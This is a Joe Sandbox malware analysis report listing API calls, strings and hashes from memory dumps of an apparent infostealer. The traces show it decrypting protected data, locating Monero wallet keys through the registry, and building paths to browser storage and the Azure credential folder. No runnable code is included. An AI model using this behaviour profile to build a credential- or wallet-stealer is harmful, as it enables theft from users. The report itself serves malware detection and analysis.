                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 1940255200-0
                                  • Opcode ID: eed0d37a715755c7c057798a9f70bfce674a096e0d27356d67b5e0a7538fe706
                                  • Instruction ID: a60ace99413e7afb7379f67eccb5655bd0e955a0448941e7ef2ba379164ee1f6
                                  • Opcode Fuzzy Hash: eed0d37a715755c7c057798a9f70bfce674a096e0d27356d67b5e0a7538fe706
                                  • Instruction Fuzzy Hash: 45317571A40624BFD715DB94CC92FEAB7B9DB88B10F108184FA04EB2D0D7B0AE44CB90
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00309B9F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00309BB3
                                  • LocalFree.KERNEL32(?), ref: 00309BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 3c66a702f908ace804ba0ab6ab27a881c2a3f4498c9863bb9c147d573295cfcf
                                  • Instruction ID: 1e6cd0bf7c5e06884a075dfde48ec40e30f42df616ebc0760eab0ecfe29dd19b
                                  • Opcode Fuzzy Hash: 3c66a702f908ace804ba0ab6ab27a881c2a3f4498c9863bb9c147d573295cfcf
                                  • Instruction Fuzzy Hash: 70011DB5E42309ABE7109BA4DC55FAEB778EB44B00F104555FA04AB381E7B49A04CBE1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,D_$6 i
                                  • API String ID: 0-3871559175
                                  • Opcode ID: a50da02027c8b52d365e64cf77ccd3667ed84717c08099ab240a39214879751c
                                  • Instruction ID: 335314312fad410de139e49cc2fa5700288329e70c70d56894f0410b69804829
                                  • Opcode Fuzzy Hash: a50da02027c8b52d365e64cf77ccd3667ed84717c08099ab240a39214879751c
                                  • Instruction Fuzzy Hash: 75B2E3F3A086049FD304AF29EC8567AFBE9EF94720F16493DEAC4C3744EA3558058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D9s=$D9s=$SS&w
                                  • API String ID: 0-234490397
                                  • Opcode ID: a53161ba8a588f5976a9d3bd056e7ee712c6d299a14fa3c299f3c0e5215249c1
                                  • Instruction ID: b19d3ab66fd2cfa1ee4cc20a66265840961e3b3dbde5826a70e834e71d652119
                                  • Opcode Fuzzy Hash: a53161ba8a588f5976a9d3bd056e7ee712c6d299a14fa3c299f3c0e5215249c1
                                  • Instruction Fuzzy Hash: 234126F3E082245FF3106E2DEC8576AB6D6EB94320F1B8539DEC893384E4796C1586C6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2
                                  • API String ID: 0-450215437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (Ap
                                  • API String ID: 0-2128486027
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ~YK'
                                  • API String ID: 0-2135834153
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: S=~m
                                  • API String ID: 0-1458585614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2
                                  • API String ID: 0-450215437
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00318636
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031866D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 003186AA
                                  • StrStrA.SHLWAPI(?,0102DEE0), ref: 003186CF
                                  • lstrcpyn.KERNEL32(005393D0,?,00000000), ref: 003186EE
                                  • lstrlen.KERNEL32(?), ref: 00318701
                                  • wsprintfA.USER32 ref: 00318711
                                  • lstrcpy.KERNEL32(?,?), ref: 00318727
                                  • StrStrA.SHLWAPI(?,0102E078), ref: 00318754
                                  • lstrcpy.KERNEL32(?,005393D0), ref: 003187B4
                                  • StrStrA.SHLWAPI(?,0102E048), ref: 003187E1
                                  • lstrcpyn.KERNEL32(005393D0,?,00000000), ref: 00318800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                  • String ID: %s%s
                                  • API String ID: 2672039231-3252725368
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00301F9F
                                  • lstrlen.KERNEL32(01028990), ref: 00301FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00301FE3
                                  • lstrlen.KERNEL32(00331794), ref: 00301FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030200E
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00302042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030204D
                                  • lstrlen.KERNEL32(00331794), ref: 00302058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302075
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00302081
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003020AC
                                  • lstrlen.KERNEL32(?), ref: 003020E4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302104
                                  • lstrcat.KERNEL32(00000000,?), ref: 00302112
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302139
                                  • lstrlen.KERNEL32(00331794), ref: 0030214B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030216B
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00302177
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030219D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003021A8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003021D4
                                  • lstrlen.KERNEL32(?), ref: 003021EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030220A
                                  • lstrcat.KERNEL32(00000000,?), ref: 00302218
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302242
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030227F
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0030228D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003022B1
                                  • lstrcat.KERNEL32(00000000,0102CBA0), ref: 003022B9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003022F7
                                  • lstrcat.KERNEL32(00000000), ref: 00302304
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030232D
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00302356
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302382
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003023BF
                                  • DeleteFileA.KERNEL32(00000000), ref: 003023F7
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00302444
                                  • FindClose.KERNEL32(00000000), ref: 00302453
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                  • String ID:
                                  • API String ID: 2857443207-0
                                  • Opcode ID: 25ac88799175fd2130d95ae45d89c830d610f9309a8e58095bb525fd0ca2cf87
                                  • Instruction ID: bafcdd8cc4736cac96b3efe39b92c042a70cd5bb67f748c7d7b4f04c4f5beb14
                                  • Opcode Fuzzy Hash: 25ac88799175fd2130d95ae45d89c830d610f9309a8e58095bb525fd0ca2cf87
                                  • Instruction Fuzzy Hash: E8E13071A126169BCB23EFA8DD9DAAF77B9AF14300F054064F805AB291DF34DD19CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316445
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316480
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003164AA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003164E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316506
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031650E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316537
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FolderPathlstrcat
                                  • String ID: \..\
                                  • API String ID: 2938889746-4220915743
                                  • Opcode ID: a5384f9305bcc0049d2a5ba93280c218eb5f8a207e1248d3a8bd99a9952aeb08
                                  • Instruction ID: 6635a4e65d85b40081cbf92391d1c71fd7b32f7ed61edfdf5db2d0200ef65fff
                                  • Opcode Fuzzy Hash: a5384f9305bcc0049d2a5ba93280c218eb5f8a207e1248d3a8bd99a9952aeb08
                                  • Instruction Fuzzy Hash: 54F18F70A116169BCB27EFA8D85AAAF77B9AF48300F054128F855DB291DF34DC85CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003143A3
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003143D6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003143FE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00314409
                                  • lstrlen.KERNEL32(\storage\default\), ref: 00314414
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314431
                                  • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0031443D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314466
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00314471
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314498
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003144D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 003144DF
                                  • lstrlen.KERNEL32(00331794), ref: 003144EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314507
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00314513
                                  • lstrlen.KERNEL32(.metadata-v2), ref: 0031451E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031453B
                                  • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00314547
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031456E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003145A0
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003145A7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314601
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031462A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314653
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031467B
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003146AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                  • String ID: .metadata-v2$\storage\default\
                                  • API String ID: 1033685851-762053450
                                  • Opcode ID: ae140fa53805f19f0d3a4018d4ef119675f2d4475c5c879a55905fdd51cd423f
                                  • Instruction ID: 55c9f9464ccddce52c557375d5d108c7552e075072522f801ea9a24e5ebaecbb
                                  • Opcode Fuzzy Hash: ae140fa53805f19f0d3a4018d4ef119675f2d4475c5c879a55905fdd51cd423f
                                  • Instruction Fuzzy Hash: D4B18070A126069BCB27EF78DD9DAAF77A9AF18300F050124F845EB291DF34DC558B90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003157D5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00315804
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315835
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031585D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00315868
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315890
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003158C8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003158D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003158F8
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031592E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315956
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00315961
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315988
                                  • lstrlen.KERNEL32(00331794), ref: 0031599A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003159B9
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 003159C5
                                  • lstrlen.KERNEL32(0102CB10), ref: 003159D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003159F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00315A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315A2C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315A58
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00315A5F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00315AB7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00315B2D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00315B56
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00315B89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315BB5
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00315BEF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00315C4C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00315C70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2428362635-0
                                  • Opcode ID: 40c325375b33a40efabdefb2f0ea04d371d7828a6d586f5494596bf29bfa2183
                                  • Instruction ID: 911f9eef46ca0c1fca3d2bfccbb48fd206f4f4e323a01d69d0748a41a45f5d45
                                  • Opcode Fuzzy Hash: 40c325375b33a40efabdefb2f0ea04d371d7828a6d586f5494596bf29bfa2183
                                  • Instruction Fuzzy Hash: 5E029171A11605DFCB27EF68C899AEF77B5AF98300F054128F805AB290DB74DD89CB90
                                  APIs
                                    • Part of subcall function 00301120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00301135
                                    • Part of subcall function 00301120: RtlAllocateHeap.NTDLL(00000000), ref: 0030113C
                                    • Part of subcall function 00301120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00301159
                                    • Part of subcall function 00301120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00301173
                                    • Part of subcall function 00301120: RegCloseKey.ADVAPI32(?), ref: 0030117D
                                  • lstrcat.KERNEL32(?,00000000), ref: 003011C0
                                  • lstrlen.KERNEL32(?), ref: 003011CD
                                  • lstrcat.KERNEL32(?,.keys), ref: 003011E8
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030121F
                                  • lstrlen.KERNEL32(01028990), ref: 0030122D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301251
                                  • lstrcat.KERNEL32(00000000,01028990), ref: 00301259
                                  • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00301264
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301288
                                  • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00301294
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003012BA
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003012FF
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0030130E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301335
                                  • lstrcat.KERNEL32(00000000,?), ref: 0030133D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301378
                                  • lstrcat.KERNEL32(00000000), ref: 00301385
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003013AC
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003013D5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301401
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030143D
                                    • Part of subcall function 0031EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0031EE12
                                  • DeleteFileA.KERNEL32(?), ref: 00301471
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2881711868-3586502688
                                  • Opcode ID: b2bb85848d2e1f804a08141652b387635bef9e5580b970fa082121b9f814dac1
                                  • Instruction ID: d2113ede61696f749195f780e134ad7f7a7a9f80d97699dff21bbc08d4574755
                                  • Opcode Fuzzy Hash: b2bb85848d2e1f804a08141652b387635bef9e5580b970fa082121b9f814dac1
                                  • Instruction Fuzzy Hash: A6A17F71A122069BCB23EBB8DC99AAF77B9AF54300F050464F905EB291DF34DD19DB90
                                  APIs
                                  • memset.MSVCRT ref: 0031E740
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0031E769
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E79F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E7AD
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 0031E7C6
                                  • memset.MSVCRT ref: 0031E805
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0031E82D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E85F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E86D
